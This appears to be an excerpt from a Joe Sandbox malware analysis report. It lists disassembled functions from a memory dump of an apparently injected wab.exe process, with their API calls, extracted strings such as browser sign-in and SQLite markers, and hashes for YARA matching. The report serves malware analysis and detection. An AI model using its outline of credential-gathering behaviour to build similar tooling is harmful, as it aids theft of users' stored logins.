                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 290601579-0
                                          • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                          • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memchrmemset
                                          • String ID: PD$PD
                                          • API String ID: 1581201632-2312785699
                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                          • GetDC.USER32(00000000), ref: 00409F6E
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                          • GetParent.USER32(?), ref: 00409FA5
                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                          • String ID:
                                          • API String ID: 2163313125-0
                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$wcslen
                                          • String ID:
                                          • API String ID: 239872665-3916222277
                                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$_snwprintfmemset
                                          • String ID: %s (%s)$YV@
                                          • API String ID: 3979103747-598926743
                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                          • wcslen.MSVCRT ref: 0040A6B1
                                          • wcscpy.MSVCRT ref: 0040A6C1
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                          • wcscpy.MSVCRT ref: 0040A6DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2767993716-572158859
                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 0040DAFB
                                          • wcscpy.MSVCRT ref: 0040DB0B
                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          • API String ID: 3176057301-2039793938
                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • too many attached databases - max %d, xrefs: 0042F64D
                                          • database is already attached, xrefs: 0042F721
                                          • out of memory, xrefs: 0042F865
                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                          • unable to open database: %s, xrefs: 0042F84E
                                          • database %s is already in use, xrefs: 0042F6C5
                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                          • memcpy.MSVCRT ref: 0040EB80
                                          • memcpy.MSVCRT ref: 0040EB94
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                          • String ID: ($d
                                          • API String ID: 1140211610-1915259565
                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                          • GetLastError.KERNEL32 ref: 004178FB
                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastLockSleepUnlock
                                          • String ID:
                                          • API String ID: 3015003838-0
                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00407E44
                                          • memset.MSVCRT ref: 00407E5B
                                          • _mbscpy.MSVCRT ref: 00407E7E
                                          • _mbscpy.MSVCRT ref: 00407ED7
                                          • _mbscpy.MSVCRT ref: 00407EEE
                                          • _mbscpy.MSVCRT ref: 00407F01
                                          • wcscpy.MSVCRT ref: 00407F10
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                          • String ID:
                                          • API String ID: 59245283-0
                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                          • GetLastError.KERNEL32 ref: 0041855C
                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                          • GetLastError.KERNEL32 ref: 0041858E
                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                          • String ID:
                                          • API String ID: 3467550082-0
                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                          • memset.MSVCRT ref: 00413ADC
                                          • memset.MSVCRT ref: 00413AEC
                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                          • memset.MSVCRT ref: 00413BD7
                                          • wcscpy.MSVCRT ref: 00413BF8
                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                          • String ID: 3A
                                          • API String ID: 3300951397-293699754
                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                          • wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                          • wcslen.MSVCRT ref: 0040D1D3
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                          • memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                          • String ID: strings
                                          • API String ID: 3166385802-3030018805
                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00411AF6
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • wcsrchr.MSVCRT ref: 00411B14
                                          • wcscat.MSVCRT ref: 00411B2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                          • String ID: AE$.cfg$General$EA
                                          • API String ID: 776488737-1622828088
                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040D8BD
                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                          • memset.MSVCRT ref: 0040D906
                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                          • String ID: sysdatetimepick32
                                          • API String ID: 1028950076-4169760276
                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: -journal$-wal
                                          • API String ID: 438689982-2894717839
                                          • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                          • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Item$Dialog$MessageSend
                                          • String ID:
                                          • API String ID: 3975816621-0
                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 00444D09
                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                          • _wcsicmp.MSVCRT ref: 00444D33
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$wcslen$_memicmp
                                          • String ID: .save$http://$https://$log profile$signIn
                                          • API String ID: 1214746602-2708368587
                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                          • String ID:
                                          • API String ID: 2313361498-0
                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                          • GetWindow.USER32(00000000), ref: 00405F80
                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
